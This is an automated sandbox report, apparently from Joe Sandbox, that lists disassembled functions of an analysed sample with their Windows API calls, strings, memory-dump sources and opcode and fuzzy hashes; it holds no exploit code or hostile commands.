Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0078219B
GetDC.USER32(00000000), ref: 007821A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 007821B1
ReleaseDC.USER32(?), ref: 007821D2

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: bae3948be7e5f9842c8309e8c501c369adb441c896f7488894b5c0f676af3612
Instruction ID: b3f9088a407c9652a06f3b5b48a3e634876884a08233c1db840fa0259e9e7347
Opcode Fuzzy Hash: bae3948be7e5f9842c8309e8c501c369adb441c896f7488894b5c0f676af3612
Instruction Fuzzy Hash: 8DE0EEB5800204AFCB02AFA0C808A9EBBA2AB4C310F10C029F95AA7220CB3C91419F44

Function 007463A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%}, xrefs: 007463AE

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID:
String ID: %}
API String ID: 0-578177530
Opcode ID: 683fec01f589d40f29d57935da48b5727ac21f62f1a25cfd51a90ac6595488e3
Instruction ID: 58b313f4371829cc0282a28cdeb8cc536c91f21f8f576456cf0b20fa73af0ac3
Opcode Fuzzy Hash: 683fec01f589d40f29d57935da48b5727ac21f62f1a25cfd51a90ac6595488e3
Instruction Fuzzy Hash: 6CB1C271900109DBCF14EF98C4859FEB7B9FF45310F50402AE902A7195EB3C9E95CB52

Function 007AB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0075FEC6: _wcscpy.LIBCMT ref: 0075FEE9

Part of subcall function 00749997: __itow.LIBCMT ref: 007499C2
Part of subcall function 00749997: __swprintf.LIBCMT ref: 00749A0C

__wcsnicmp.LIBCMT ref: 007AB298
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 007AB361

Strings

LPT, xrefs: 007AB292

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: b439b76d506ce5b6d9684646728f3ddcccd65b500b91d7ccd42f449ba005f65d
Instruction ID: 73cfa4bfe43c9a75ae0386ca872b01ee5a18d5d87e161c73f52607b2de021a5b
Opcode Fuzzy Hash: b439b76d506ce5b6d9684646728f3ddcccd65b500b91d7ccd42f449ba005f65d
Instruction Fuzzy Hash: B8618375A00215EFCF14DF94C885EAEB7B4EF89310F11415AF946AB392DB78AE40CB50

Function 00788A77 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00788B1E
_memmove.LIBCMT ref: 00788B78

Strings

Oau, xrefs: 00788BF2, 0078E39A, 0078E3B6

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _memmove
String ID: Oau
API String ID: 4104443479-3624848570
Opcode ID: 0cb0f0db11054e2ef1a25a6634b9cc9a7bbfb2228f2dd9c558145c0cf982c16f
Instruction ID: 8d0b043b900c28658641e4f1f58e796542d9f0a48174bf39759b6d84d10e66d5
Opcode Fuzzy Hash: 0cb0f0db11054e2ef1a25a6634b9cc9a7bbfb2228f2dd9c558145c0cf982c16f
Instruction Fuzzy Hash: 6B5181B0900609DFCF64DF68C884AAEBBF1FF44314F54852AE85AD7240EB38AD95CB51

Function 00752AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00752AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 00752AE1

Strings

@, xrefs: 00752AD5

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 6c2b8de98cc6e09a47519edb783d0c2f832ffd212c87b7ae5bfbecec8bdd08a7
Instruction ID: 4d3d196b5aed21c650c5b1fff227cc3ccd3bf0a8068bc88bf487e350f0ef27b3
Opcode Fuzzy Hash: 6c2b8de98cc6e09a47519edb783d0c2f832ffd212c87b7ae5bfbecec8bdd08a7
Instruction Fuzzy Hash: E9514771518745DBD320AF10DC8ABAFBBE8FF84310F42885DF2D9511A1DB388529CB66

Function 007A99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 0074506B: __fread_nolock.LIBCMT ref: 00745089

_wcscmp.LIBCMT ref: 007A9AAE
_wcscmp.LIBCMT ref: 007A9AC1

Strings

FILE, xrefs: 007A99FA

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: ff42affdcc5172339f54fb8d01c42819b31cb852b0a9ba8a7f475e9ad2a35a69
Instruction ID: 302021744a228ca6f4d217ae94de94467c2755b52a8657456033133e4ea94255
Opcode Fuzzy Hash: ff42affdcc5172339f54fb8d01c42819b31cb852b0a9ba8a7f475e9ad2a35a69
Instruction Fuzzy Hash: CA41D6B1A00619FBDF209AA4DC49FEFB7B9DF86710F000179BA00A7191DB799A1487A1

Function 007B2882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007B2892
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007B28C8

Strings

|, xrefs: 007B2899

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 216ad117c6b02ad04f8fb0801a591d77b0778c3e9631c64ff201508300ad26e2
Instruction ID: 25524aa2210ee989a574185b19b75a5a7b06e8385aa3a023ea2361289559a874
Opcode Fuzzy Hash: 216ad117c6b02ad04f8fb0801a591d77b0778c3e9631c64ff201508300ad26e2
Instruction Fuzzy Hash: 29311971801119EFCF05AFA1CC89EEEBFB9FF08350F104029F815A6166EB355A56DBA0

Function 007C6CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 007C6D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007C6DC2

Strings

static, xrefs: 007C6D22

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: e58e700ec4db0191a739fd4d8d1a61f080dbce8c19880c62c1dd690b1912f824
Instruction ID: 7e14b4b0267c15fd40e10c0e42da1f5b0193e10950dce603371e971385a410c7
Opcode Fuzzy Hash: e58e700ec4db0191a739fd4d8d1a61f080dbce8c19880c62c1dd690b1912f824
Instruction Fuzzy Hash: 35317C71200604AADF109F68CC85FFB77A9FF48724F10861DF9A697190DB39AC91DBA4

Function 007A2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007A2E00
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007A2E3B

Strings

0, xrefs: 007A2DF9

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 185a59cb75f5f2bc2cbf138fea1ad5f3148b118cb26bfb10c6dd78bb5d8fb962
Instruction ID: faf22fcb35aefbde217461f844a72b31a91c7db6424c88669c6b1d0e5f05ff5e
Opcode Fuzzy Hash: 185a59cb75f5f2bc2cbf138fea1ad5f3148b118cb26bfb10c6dd78bb5d8fb962
Instruction Fuzzy Hash: 2B31F731604305EBEB248F4CC849B9EBBB5FF86300F244229ED85D61A2E7789986CB50

Function 007C6943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007C69D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007C69DB

Strings

Combobox, xrefs: 007C699D

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 9cb1e094cc964463c6e70234c1354880eeceeddcbea8278fb647f20c4a90b18b
Instruction ID: 969d43925c136413a9d11df489fe2fdbf913a5049d12f5c89e44c73bf90b6c70
Opcode Fuzzy Hash: 9cb1e094cc964463c6e70234c1354880eeceeddcbea8278fb647f20c4a90b18b
Instruction Fuzzy Hash: 7011B271700208AFEF119E14CCC0FBB37AAEB893A4F11422DF95897290D679AC9187A0

Function 007C6E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00741D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00741D73
Part of subcall function 00741D35: GetStockObject.GDI32(00000011), ref: 00741D87
Part of subcall function 00741D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00741D91

GetWindowRect.USER32(00000000,?), ref: 007C6EE0
GetSysColor.USER32(00000012), ref: 007C6EFA

Strings

static, xrefs: 007C6EBD

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 1f707aa71da0a5a01270df32f24ed715ee88264249b7fc991987d2f0dbcd6fa6
Instruction ID: bdd8f5d119ed2b13250c27c2bc048b8e0b2718af21af1e6ea225d2932188ba50
Opcode Fuzzy Hash: 1f707aa71da0a5a01270df32f24ed715ee88264249b7fc991987d2f0dbcd6fa6
Instruction Fuzzy Hash: 7421F972610209AFDB04DFA8DD45EFA7BB9FB08314F04462DF955D3250E739E8619B50

Function 007C6B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 007C6C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007C6C20

Strings

edit, xrefs: 007C6BF5

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: dfa2e3423d384a68e8a41fb3d2ad1dfb47412da44e33eb58e478e092a103986e
Instruction ID: e5ca15351fcbac5fd3296b609a3635c3cd027702d4a3e14efb9cab391fe401c4
Opcode Fuzzy Hash: dfa2e3423d384a68e8a41fb3d2ad1dfb47412da44e33eb58e478e092a103986e
Instruction Fuzzy Hash: C4116DB1500108ABEB105E649C85FEA376AEB05378F60472CF965D71D0C779EC919B60

Function 007A2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007A2F11
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007A2F30

Strings

0, xrefs: 007A2F07

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 2c4cb21b07f76021e0bdc3bcfd5bc198da67efca4282892ba733b8bd45135c4d
Instruction ID: 6015b2c349a5fbf514f1745ad80823f8d09f36882385a33e4f9ab6513b017807
Opcode Fuzzy Hash: 2c4cb21b07f76021e0bdc3bcfd5bc198da67efca4282892ba733b8bd45135c4d
Instruction Fuzzy Hash: 6F11E636905114EFCB20DB5CDC08F9973B9EB86310F0842B5EC54A72A2D778AD16C791

Function 007B24CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007B2520
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007B2549

Strings

<local>, xrefs: 007B2511

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: d98b62db9485b6d70609547bdcfc2677200d44d4936c471c4f8683dca07bec7d
Instruction ID: cc900de6be1c1327287bfd07872b5911cbd464d6209b9fb8bc0091cd85bdcb44
Opcode Fuzzy Hash: d98b62db9485b6d70609547bdcfc2677200d44d4936c471c4f8683dca07bec7d
Instruction Fuzzy Hash: A61102B0202225BADB348F518C98FFBFF68FF06351F10826AF90552041D2786D62DAF0

Function 007B80A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 007B830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,007B80C8,?,00000000,?,?), ref: 007B8322

inet_addr.WSOCK32(00000000), ref: 007B80CB
htons.WSOCK32(00000000), ref: 007B8108

Strings

255.255.255.255, xrefs: 007B80E3

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: ab6aaecba0a1240afc38f133804d1dbe8762b0a8749e9eee90d12e10e5d0391f
Instruction ID: 6d1381debe3ec8737b3a266d64f5ffae058c41e2e05df400411a5222afec0def
Opcode Fuzzy Hash: ab6aaecba0a1240afc38f133804d1dbe8762b0a8749e9eee90d12e10e5d0391f
Instruction Fuzzy Hash: 3911A574600209EBDB10AF64DC8AFFDB769FF04350F10852AE91197291DB79A815C696

Function 007992E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82

Part of subcall function 0079B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0079B0E7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00799355

Strings

ComboBox, xrefs: 007992F4
ListBox, xrefs: 0079931F

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 6b4cdbf7748617238d9197f7e7833de4f9d1254a5eb7ffd68577ed2ba04572e0
Instruction ID: 628afa7dbba45d3f10bb17f76b014770f883ebd59bc11495a7361e120edb888d
Opcode Fuzzy Hash: 6b4cdbf7748617238d9197f7e7833de4f9d1254a5eb7ffd68577ed2ba04572e0
Instruction Fuzzy Hash: CC019E71A45218EB9F08EFA8DC96CFE7769BF06320B14061DFA72572D2DB39590C8650

Function 007991DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82

Part of subcall function 0079B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0079B0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 0079924D

Strings

ComboBox, xrefs: 007991EC
ListBox, xrefs: 00799217

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
